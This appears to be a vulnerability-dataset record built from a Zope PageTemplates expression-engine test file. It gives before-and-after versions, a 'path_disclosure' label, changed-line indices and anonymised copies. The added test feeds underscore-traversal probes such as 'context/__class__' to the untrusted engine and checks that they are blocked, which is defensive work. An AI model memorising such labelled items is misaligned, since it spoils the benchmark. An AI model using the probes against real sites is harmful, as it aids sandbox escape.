def _makeOne(self, engine=None, contexts=None):
if engine is None:
engine = self._makeEngine()
if contexts is None:
contexts = {}
return self._getTargetClass()(engine, contexts)
def _makeEngine(self):
class DummyEngine:
pass
return DummyEngine()
def test_class_conforms_to_ITALExpressionEngine(self):
from zope.interface.verify import verifyClass
from zope.tal.interfaces import ITALExpressionEngine
verifyClass(ITALExpressionEngine, self._getTargetClass())
def test_instance_conforms_to_ITALExpressionEngine(self):
from zope.interface.verify import verifyObject
from zope.tal.interfaces import ITALExpressionEngine
verifyObject(ITALExpressionEngine, self._makeOne())
def test_createErrorInfo_returns_unrestricted_object(self):
# See: https://bugs.launchpad.net/zope2/+bug/174705
context = self._makeOne()
info = context.createErrorInfo(AttributeError('nonesuch'), (12, 3))
self.assertTrue(info.type is AttributeError)
self.assertEqual(info.__allow_access_to_unprotected_subobjects__, 1)
| import unittest
import warnings
from AccessControl import safe_builtins
from zExceptions import NotFound
from zope.component.testing import PlacelessSetup
class EngineTestsBase(PlacelessSetup):
def setUp(self):
from zope.component import provideAdapter
from zope.traversing.adapters import DefaultTraversable
PlacelessSetup.setUp(self)
provideAdapter(DefaultTraversable, (None,))
def tearDown(self):
PlacelessSetup.tearDown(self)
def _makeEngine(self):
# subclasses must override
raise NotImplementedError
def _makeContext(self, bindings=None):
class Dummy:
__allow_access_to_unprotected_subobjects__ = 1
def __call__(self):
return 'dummy'
class DummyDocumentTemplate:
__allow_access_to_unprotected_subobjects__ = 1
isDocTemp = True
def __call__(self, client=None, REQUEST={}, RESPONSE=None, **kw):
return 'dummy'
def absolute_url(self, relative=0):
url = 'dummy'
if not relative:
url = "http://server/" + url
return url
_DEFAULT_BINDINGS = dict(
one=1,
d={'one': 1, 'b': 'b', '': 'blank', '_': 'under'},
blank='',
dummy=Dummy(),
dummy2=DummyDocumentTemplate(),
eightbit=b'\xe4\xfc\xf6',
# ZopeContext needs 'context' and 'template' keys for unicode
# conflict resolution
context=Dummy(),
template=DummyDocumentTemplate(),
)
if bindings is None:
bindings = _DEFAULT_BINDINGS
return self._makeEngine().getContext(bindings)
def test_compile(self):
# Test expression compilation
e = self._makeEngine()
for p in ('x', 'x/y', 'x/y/z'):
e.compile(p)
e.compile('path:a|b|c/d/e')
e.compile('string:Fred')
e.compile('string:A$B')
e.compile('string:a ${x/y} b ${y/z} c')
e.compile('python: 2 + 2')
e.compile('python: 2 \n+\n 2\n')
def test_evaluate_simple_path_binding(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('one'), 1)
def test_evaluate_simple_path_dict_key_int_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/one'), 1)
def test_evaluate_simple_path_dict_key_string_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/b'), 'b')
def test_evaluate_with_render_simple_callable(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('dummy'), 'dummy')
def test_evaluate_with_unimplemented_call(self):
class Dummy:
def __call__(self):
raise NotImplementedError()
dummy = Dummy()
ec = self._makeContext(bindings={'dummy': dummy})
self.assertIs(ec.evaluate('dummy'), dummy)
def test_evaluate_with_render_DTML_template(self):
# http://www.zope.org/Collectors/Zope/2232
# DTML templates could not be called from a Page Template
# due to an ImportError
ec = self._makeContext()
self.assertEqual(ec.evaluate('dummy2'), 'dummy')
def test_evaluate_alternative_first_missing(self):
ec = self._makeContext()
self.assertTrue(ec.evaluate('x | nothing') is None)
def test_evaluate_dict_key_as_underscore(self):
# Traversing to the name `_` will raise a DeprecationWarning
# because it will go away in Zope 6.
ec = self._makeContext()
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.assertEqual(ec.evaluate('d/_'), 'under')
def test_evaluate_dict_with_key_from_expansion(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/?blank'), 'blank')
def test_hybrid_with_python_expression_int_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | python:1+1'), 2)
def test_hybrid_with_python_expression_type_value_not_called(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | python:int'), int)
def test_hybrid_with_string_expression(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | string:x'), 'x')
def test_hybrid_with_string_expression_and_expansion(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | string:$one'), '1')
def test_hybrid_with_compound_expression_int_value(self):
ec = self._makeContext()
self.assertTrue(ec.evaluate('x | not:exists:x'))
def test_access_iterator_from_python_expression(self):
ec = self._makeContext()
ec.beginScope()
ec.setRepeat('loop', "python:[1,2,3]")
self.assertTrue(ec.evaluate("python:repeat['loop'].odd()"))
ec.endScope()
def test_defer_expression_returns_wrapper(self):
from zope.tales.expressions import DeferWrapper
ec = self._makeContext()
defer = ec.evaluate('defer: b')
self.assertIsInstance(defer, DeferWrapper)
def test_lazy_expression_returns_wrapper(self):
from zope.tales.expressions import LazyWrapper
ec = self._makeContext()
lazy = ec.evaluate('lazy: b')
self.assertIsInstance(lazy, LazyWrapper)
def test_empty_path_expression_explicit(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('path:'), None)
def test_empty_path_expression_explicit_with_trailing_whitespace(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('path: '), None)
def test_empty_path_expression_implicit(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate(''), None)
def test_empty_path_expression_implicit_with_trailing_whitespace(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate(' \n'), None)
def test_unicode(self):
# All our string expressions are unicode now
eng = self._makeEngine()
ec = self._makeContext()
# XXX: can't do ec.evaluate(u'string:x') directly because ZopeContext
# only bothers compiling true strings, not unicode strings
result = ec.evaluate(eng.compile('string:x'))
self.assertEqual(result, 'x')
self.assertIsInstance(result, str)
def test_mixed(self):
# 8-bit strings in unicode string expressions cause UnicodeDecodeErrors
eng = self._makeEngine()
ec = self._makeContext()
expr = eng.compile('string:$eightbit')
self.assertRaises(UnicodeDecodeError,
ec.evaluate, expr)
# But registering an appropriate IUnicodeEncodingConflictResolver
# should fix it
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
self.assertEqual(ec.evaluate(expr), 'äüö')
def test_builtin_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('True'), True)
self.assertIs(ec.evaluate('False'), False)
self.assertIs(ec.evaluate('nocall: test'), safe_builtins["test"])
class UntrustedEngineTests(EngineTestsBase, unittest.TestCase):
def _makeEngine(self):
from Products.PageTemplates.Expressions import createZopeEngine
return createZopeEngine()
# XXX: add tests that show security checks being enforced
def test_open_in_path_expr(self):
ec = self._makeContext()
with self.assertRaises(KeyError):
ec.evaluate("nocall:open")
def test_list_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('nocall: list'), safe_builtins["list"])
def test_underscore_traversal(self):
# Prevent traversal to names starting with an underscore (_)
ec = self._makeContext()
with self.assertRaises(NotFound):
ec.evaluate("context/__class__")
with self.assertRaises(NotFound):
ec.evaluate("nocall: random/_itertools/repeat")
with self.assertRaises(NotFound):
ec.evaluate("random/_itertools/repeat/foobar")
class TrustedEngineTests(EngineTestsBase, unittest.TestCase):
def _makeEngine(self):
from Products.PageTemplates.Expressions import createTrustedZopeEngine
return createTrustedZopeEngine()
# XXX: add tests that show security checks *not* being enforced
def test_open_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate("nocall:open"), open)
def test_list_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('nocall: list'), list)
class UnicodeEncodingConflictResolverTests(PlacelessSetup, unittest.TestCase):
def testDefaultResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
DefaultUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(DefaultUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertRaises(UnicodeDecodeError,
resolver.resolve, None, b'\xe4\xfc\xf6', None)
def testStrictResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
text = '\xe4\xfc\xe4'
self.assertEqual(resolver.resolve(None, text, None), text)
def testIgnoringResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
IgnoringUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(IgnoringUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(resolver.resolve(None, b'\xe4\xfc\xf6', None), '')
def testReplacingResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
ReplacingUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(ReplacingUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(resolver.resolve(None, b'\xe4\xfc\xf6', None),
'\ufffd\ufffd\ufffd')
class ZopeContextTests(unittest.TestCase):
def _getTargetClass(self):
from Products.PageTemplates.Expressions import ZopeContext
return ZopeContext
def _makeOne(self, engine=None, contexts=None):
if engine is None:
engine = self._makeEngine()
if contexts is None:
contexts = {}
return self._getTargetClass()(engine, contexts)
def _makeEngine(self):
class DummyEngine:
pass
return DummyEngine()
def test_class_conforms_to_ITALExpressionEngine(self):
from zope.interface.verify import verifyClass
from zope.tal.interfaces import ITALExpressionEngine
verifyClass(ITALExpressionEngine, self._getTargetClass())
def test_instance_conforms_to_ITALExpressionEngine(self):
from zope.interface.verify import verifyObject
from zope.tal.interfaces import ITALExpressionEngine
verifyObject(ITALExpressionEngine, self._makeOne())
def test_createErrorInfo_returns_unrestricted_object(self):
# See: https://bugs.launchpad.net/zope2/+bug/174705
context = self._makeOne()
info = context.createErrorInfo(AttributeError('nonesuch'), (12, 3))
self.assertTrue(info.type is AttributeError)
self.assertEqual(info.__allow_access_to_unprotected_subobjects__, 1)
| path_disclosure | {
"code": [
" self.assertEqual(ec.evaluate('d/_'), 'under')"
],
"line_no": [
110
]
} | {
"code": [
"from zExceptions import NotFound",
" with warnings.catch_warnings():",
" self.assertEqual(ec.evaluate('d/_'), 'under')",
" ec = self._makeContext()",
" with self.assertRaises(NotFound):",
" ec.evaluate(\"context/__class__\")",
" with self.assertRaises(NotFound):",
" ec.evaluate(\"nocall: random/_itertools/repeat\")",
" ec.evaluate(\"random/_itertools/repeat/foobar\")"
],
"line_no": [
5,
114,
116,
231,
233,
234,
236,
237,
240
]
} | import unittest
from AccessControl import safe_builtins
from zope.component.testing import PlacelessSetup
class CLASS_0(PlacelessSetup):
def FUNC_0(self):
from zope.component import provideAdapter
from zope.traversing.adapters import DefaultTraversable
PlacelessSetup.setUp(self)
provideAdapter(DefaultTraversable, (None,))
def FUNC_1(self):
PlacelessSetup.tearDown(self)
def FUNC_2(self):
raise NotImplementedError
def FUNC_3(self, VAR_0=None):
class CLASS_5:
__allow_access_to_unprotected_subobjects__ = 1
def __call__(self):
return 'dummy'
class CLASS_6:
__allow_access_to_unprotected_subobjects__ = 1
VAR_16 = True
def __call__(self, VAR_17=None, VAR_18={}, VAR_19=None, **VAR_20):
return 'dummy'
def FUNC_40(self, VAR_21=0):
VAR_22 = 'dummy'
if not VAR_21:
VAR_22 = "http://server/" + VAR_22
return VAR_22
VAR_3 = dict(
one=1,
d={'one': 1, 'b': 'b', '': 'blank', '_': 'under'},
blank='',
VAR_6=CLASS_5(),
dummy2=CLASS_6(),
eightbit=b'\xe4\xfc\xf6',
VAR_14=CLASS_5(),
template=CLASS_6(),
)
if VAR_0 is None:
VAR_0 = VAR_3
return self._makeEngine().getContext(VAR_0)
def FUNC_4(self):
VAR_4 = self._makeEngine()
for p in ('x', 'x/y', 'x/y/z'):
VAR_4.compile(p)
VAR_4.compile('path:a|b|c/d/e')
VAR_4.compile('string:Fred')
VAR_4.compile('string:A$B')
VAR_4.compile('string:a ${x/y} b ${y/z} c')
VAR_4.compile('python: 2 + 2')
VAR_4.compile('python: 2 \n+\n 2\n')
def FUNC_5(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('one'), 1)
def FUNC_6(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/one'), 1)
def FUNC_7(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/b'), 'b')
def FUNC_8(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('dummy'), 'dummy')
def FUNC_9(self):
class CLASS_5:
def __call__(self):
raise NotImplementedError()
VAR_6 = CLASS_5()
VAR_5 = self._makeContext(VAR_0={'dummy': VAR_6})
self.assertIs(VAR_5.evaluate('dummy'), VAR_6)
def FUNC_10(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('dummy2'), 'dummy')
def FUNC_11(self):
VAR_5 = self._makeContext()
self.assertTrue(VAR_5.evaluate('x | nothing') is None)
def FUNC_12(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/_'), 'under')
def FUNC_13(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/?blank'), 'blank')
def FUNC_14(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | python:1+1'), 2)
def FUNC_15(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | python:int'), int)
def FUNC_16(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | string:x'), 'x')
def FUNC_17(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | string:$one'), '1')
def FUNC_18(self):
VAR_5 = self._makeContext()
self.assertTrue(VAR_5.evaluate('x | not:exists:x'))
def FUNC_19(self):
VAR_5 = self._makeContext()
VAR_5.beginScope()
VAR_5.setRepeat('loop', "python:[1,2,3]")
self.assertTrue(VAR_5.evaluate("python:repeat['loop'].odd()"))
VAR_5.endScope()
def FUNC_20(self):
from zope.tales.expressions import DeferWrapper
VAR_5 = self._makeContext()
VAR_7 = VAR_5.evaluate('defer: b')
self.assertIsInstance(VAR_7, DeferWrapper)
def FUNC_21(self):
from zope.tales.expressions import LazyWrapper
VAR_5 = self._makeContext()
VAR_8 = VAR_5.evaluate('lazy: b')
self.assertIsInstance(VAR_8, LazyWrapper)
def FUNC_22(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('path:'), None)
def FUNC_23(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('path: '), None)
def FUNC_24(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate(''), None)
def FUNC_25(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate(' \n'), None)
def FUNC_26(self):
VAR_9 = self._makeEngine()
VAR_5 = self._makeContext()
VAR_10 = VAR_5.evaluate(VAR_9.compile('string:x'))
self.assertEqual(VAR_10, 'x')
self.assertIsInstance(VAR_10, str)
def FUNC_27(self):
VAR_9 = self._makeEngine()
VAR_5 = self._makeContext()
VAR_11 = VAR_9.compile('string:$eightbit')
self.assertRaises(UnicodeDecodeError,
VAR_5.evaluate, VAR_11)
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_5.evaluate(VAR_11), 'äüö')
def FUNC_28(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('True'), True)
self.assertIs(VAR_5.evaluate('False'), False)
self.assertIs(VAR_5.evaluate('nocall: test'), safe_builtins["test"])
class CLASS_1(CLASS_0, unittest.TestCase):
def FUNC_2(self):
from Products.PageTemplates.Expressions import createZopeEngine
return createZopeEngine()
def FUNC_29(self):
VAR_5 = self._makeContext()
with self.assertRaises(KeyError):
VAR_5.evaluate("nocall:open")
def FUNC_30(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('nocall: list'), safe_builtins["list"])
class CLASS_2(CLASS_0, unittest.TestCase):
def FUNC_2(self):
from Products.PageTemplates.Expressions import createTrustedZopeEngine
return createTrustedZopeEngine()
def FUNC_29(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate("nocall:open"), open)
def FUNC_30(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('nocall: list'), list)
class CLASS_3(PlacelessSetup, unittest.TestCase):
def FUNC_31(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
DefaultUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(DefaultUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertRaises(UnicodeDecodeError,
VAR_12.resolve, None, b'\xe4\xfc\xf6', None)
def FUNC_32(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
VAR_13 = '\xe4\xfc\xe4'
self.assertEqual(VAR_12.resolve(None, VAR_13, None), VAR_13)
def FUNC_33(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
IgnoringUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(IgnoringUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_12.resolve(None, b'\xe4\xfc\xf6', None), '')
def FUNC_34(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
ReplacingUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(ReplacingUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_12.resolve(None, b'\xe4\xfc\xf6', None),
'\ufffd\ufffd\ufffd')
class CLASS_4(unittest.TestCase):
def FUNC_35(self):
from Products.PageTemplates.Expressions import ZopeContext
return ZopeContext
def FUNC_36(self, VAR_1=None, VAR_2=None):
if VAR_1 is None:
VAR_1 = self._makeEngine()
if VAR_2 is None:
VAR_2 = {}
return self._getTargetClass()(VAR_1, VAR_2)
def FUNC_2(self):
class CLASS_7:
pass
return CLASS_7()
def FUNC_37(self):
from zope.interface.verify import verifyClass
from zope.tal.interfaces import ITALExpressionEngine
verifyClass(ITALExpressionEngine, self._getTargetClass())
def FUNC_38(self):
from zope.interface.verify import verifyObject
from zope.tal.interfaces import ITALExpressionEngine
verifyObject(ITALExpressionEngine, self._makeOne())
def FUNC_39(self):
VAR_14 = self._makeOne()
VAR_15 = VAR_14.createErrorInfo(AttributeError('nonesuch'), (12, 3))
self.assertTrue(VAR_15.type is AttributeError)
self.assertEqual(VAR_15.__allow_access_to_unprotected_subobjects__, 1)
| import unittest
import warnings
from AccessControl import safe_builtins
from zExceptions import NotFound
from zope.component.testing import PlacelessSetup
class CLASS_0(PlacelessSetup):
def FUNC_0(self):
from zope.component import provideAdapter
from zope.traversing.adapters import DefaultTraversable
PlacelessSetup.setUp(self)
provideAdapter(DefaultTraversable, (None,))
def FUNC_1(self):
PlacelessSetup.tearDown(self)
def FUNC_2(self):
raise NotImplementedError
def FUNC_3(self, VAR_0=None):
class CLASS_5:
__allow_access_to_unprotected_subobjects__ = 1
def __call__(self):
return 'dummy'
class CLASS_6:
__allow_access_to_unprotected_subobjects__ = 1
VAR_16 = True
def __call__(self, VAR_17=None, VAR_18={}, VAR_19=None, **VAR_20):
return 'dummy'
def FUNC_41(self, VAR_21=0):
VAR_22 = 'dummy'
if not VAR_21:
VAR_22 = "http://server/" + VAR_22
return VAR_22
VAR_3 = dict(
one=1,
d={'one': 1, 'b': 'b', '': 'blank', '_': 'under'},
blank='',
VAR_6=CLASS_5(),
dummy2=CLASS_6(),
eightbit=b'\xe4\xfc\xf6',
VAR_14=CLASS_5(),
template=CLASS_6(),
)
if VAR_0 is None:
VAR_0 = VAR_3
return self._makeEngine().getContext(VAR_0)
def FUNC_4(self):
VAR_4 = self._makeEngine()
for p in ('x', 'x/y', 'x/y/z'):
VAR_4.compile(p)
VAR_4.compile('path:a|b|c/d/e')
VAR_4.compile('string:Fred')
VAR_4.compile('string:A$B')
VAR_4.compile('string:a ${x/y} b ${y/z} c')
VAR_4.compile('python: 2 + 2')
VAR_4.compile('python: 2 \n+\n 2\n')
def FUNC_5(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('one'), 1)
def FUNC_6(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/one'), 1)
def FUNC_7(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/b'), 'b')
def FUNC_8(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('dummy'), 'dummy')
def FUNC_9(self):
class CLASS_5:
def __call__(self):
raise NotImplementedError()
VAR_6 = CLASS_5()
VAR_5 = self._makeContext(VAR_0={'dummy': VAR_6})
self.assertIs(VAR_5.evaluate('dummy'), VAR_6)
def FUNC_10(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('dummy2'), 'dummy')
def FUNC_11(self):
VAR_5 = self._makeContext()
self.assertTrue(VAR_5.evaluate('x | nothing') is None)
def FUNC_12(self):
VAR_5 = self._makeContext()
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.assertEqual(VAR_5.evaluate('d/_'), 'under')
def FUNC_13(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/?blank'), 'blank')
def FUNC_14(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | python:1+1'), 2)
def FUNC_15(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | python:int'), int)
def FUNC_16(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | string:x'), 'x')
def FUNC_17(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | string:$one'), '1')
def FUNC_18(self):
VAR_5 = self._makeContext()
self.assertTrue(VAR_5.evaluate('x | not:exists:x'))
def FUNC_19(self):
VAR_5 = self._makeContext()
VAR_5.beginScope()
VAR_5.setRepeat('loop', "python:[1,2,3]")
self.assertTrue(VAR_5.evaluate("python:repeat['loop'].odd()"))
VAR_5.endScope()
def FUNC_20(self):
from zope.tales.expressions import DeferWrapper
VAR_5 = self._makeContext()
VAR_7 = VAR_5.evaluate('defer: b')
self.assertIsInstance(VAR_7, DeferWrapper)
def FUNC_21(self):
from zope.tales.expressions import LazyWrapper
VAR_5 = self._makeContext()
VAR_8 = VAR_5.evaluate('lazy: b')
self.assertIsInstance(VAR_8, LazyWrapper)
def FUNC_22(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('path:'), None)
def FUNC_23(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('path: '), None)
def FUNC_24(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate(''), None)
def FUNC_25(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate(' \n'), None)
def FUNC_26(self):
VAR_9 = self._makeEngine()
VAR_5 = self._makeContext()
VAR_10 = VAR_5.evaluate(VAR_9.compile('string:x'))
self.assertEqual(VAR_10, 'x')
self.assertIsInstance(VAR_10, str)
def FUNC_27(self):
VAR_9 = self._makeEngine()
VAR_5 = self._makeContext()
VAR_11 = VAR_9.compile('string:$eightbit')
self.assertRaises(UnicodeDecodeError,
VAR_5.evaluate, VAR_11)
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_5.evaluate(VAR_11), 'äüö')
def FUNC_28(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('True'), True)
self.assertIs(VAR_5.evaluate('False'), False)
self.assertIs(VAR_5.evaluate('nocall: test'), safe_builtins["test"])
class CLASS_1(CLASS_0, unittest.TestCase):
def FUNC_2(self):
from Products.PageTemplates.Expressions import createZopeEngine
return createZopeEngine()
def FUNC_29(self):
VAR_5 = self._makeContext()
with self.assertRaises(KeyError):
VAR_5.evaluate("nocall:open")
def FUNC_30(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('nocall: list'), safe_builtins["list"])
def FUNC_31(self):
VAR_5 = self._makeContext()
with self.assertRaises(NotFound):
VAR_5.evaluate("context/__class__")
with self.assertRaises(NotFound):
VAR_5.evaluate("nocall: random/_itertools/repeat")
with self.assertRaises(NotFound):
VAR_5.evaluate("random/_itertools/repeat/foobar")
class CLASS_2(CLASS_0, unittest.TestCase):
def FUNC_2(self):
from Products.PageTemplates.Expressions import createTrustedZopeEngine
return createTrustedZopeEngine()
def FUNC_29(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate("nocall:open"), open)
def FUNC_30(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('nocall: list'), list)
class CLASS_3(PlacelessSetup, unittest.TestCase):
def FUNC_32(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
DefaultUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(DefaultUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertRaises(UnicodeDecodeError,
VAR_12.resolve, None, b'\xe4\xfc\xf6', None)
def FUNC_33(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
VAR_13 = '\xe4\xfc\xe4'
self.assertEqual(VAR_12.resolve(None, VAR_13, None), VAR_13)
def FUNC_34(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
IgnoringUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(IgnoringUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_12.resolve(None, b'\xe4\xfc\xf6', None), '')
def FUNC_35(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
ReplacingUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(ReplacingUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_12.resolve(None, b'\xe4\xfc\xf6', None),
'\ufffd\ufffd\ufffd')
class CLASS_4(unittest.TestCase):
def FUNC_36(self):
from Products.PageTemplates.Expressions import ZopeContext
return ZopeContext
def FUNC_37(self, VAR_1=None, VAR_2=None):
if VAR_1 is None:
VAR_1 = self._makeEngine()
if VAR_2 is None:
VAR_2 = {}
return self._getTargetClass()(VAR_1, VAR_2)
def FUNC_2(self):
class CLASS_7:
pass
return CLASS_7()
def FUNC_38(self):
from zope.interface.verify import verifyClass
from zope.tal.interfaces import ITALExpressionEngine
verifyClass(ITALExpressionEngine, self._getTargetClass())
def FUNC_39(self):
from zope.interface.verify import verifyObject
from zope.tal.interfaces import ITALExpressionEngine
verifyObject(ITALExpressionEngine, self._makeOne())
def FUNC_40(self):
VAR_14 = self._makeOne()
VAR_15 = VAR_14.createErrorInfo(AttributeError('nonesuch'), (12, 3))
self.assertTrue(VAR_15.type is AttributeError)
self.assertEqual(VAR_15.__allow_access_to_unprotected_subobjects__, 1)
| [
2,
5,
6,
8,
14,
17,
19,
21,
23,
26,
29,
33,
36,
42,
50,
51,
55,
59,
61,
71,
75,
79,
83,
87,
92,
96,
98,
99,
100,
103,
107,
111,
115,
119,
123,
127,
131,
135,
142,
148,
154,
158,
162,
166,
170,
172,
175,
176,
180,
182,
188,
189,
198,
204,
205,
207,
211,
212,
213,
218,
222,
223,
225,
229,
230,
231,
235,
239,
240,
242,
255,
268,
280,
293,
294,
296,
300,
307,
312,
317,
322,
324,
329
] | [
3,
7,
8,
10,
16,
19,
21,
23,
25,
28,
31,
35,
38,
44,
52,
53,
